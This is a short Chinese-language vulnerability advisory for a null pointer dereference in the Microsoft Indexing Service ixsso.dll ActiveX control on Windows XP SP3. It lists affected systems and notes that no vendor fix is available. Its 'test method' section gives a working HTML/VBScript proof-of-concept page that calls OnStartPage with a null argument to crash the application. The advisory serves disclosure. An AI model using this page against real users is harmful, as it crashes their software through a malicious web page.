Microsoft Indexing Service ‘ixsso.dll’ ActiveX控件拒绝服务漏洞

漏洞起因
设计错误
危险等级

影响系统
Microsoft Indexing Service Server-side (ixsso.dll) 5.1.2600.5512
Microsoft windows XP Sp3

不受影响系统

危害
远程攻击者可以利用漏洞使应用程序崩溃。

攻击所需条件
攻击者必须构建恶意WEB页,诱使用户解析。

漏洞信息
Microsoft windows是一款流行的操作系统。
Microsoft windows Indexing Service Server-side (ixsso.dll)存在空指针引用错误,允许攻击者构建恶意WEB页,诱使用户解析,使应用程序崩溃。

测试方法
<html>
Exploit
<object classid=’clsid:A4463024-2B6F-11D0-BFBC-0020F8008024′
id=’target’ /></object>
<script language=’vbscript’>
targetFile = “C:\WINDOWS\system32\ixsso.dll”
prototype  = “Property Let OnStartPage As object”
memberName = “OnStartPage”
progid     = “Cisso.CissoQuery”
argCount   = 1
Set arg1=Nothing
target.OnStartPage arg1
</script>

厂商解决方案
目前没有详细解决方案提供:
http://www.microsoft.com/

漏洞提供者
coolkaveh

评论关闭。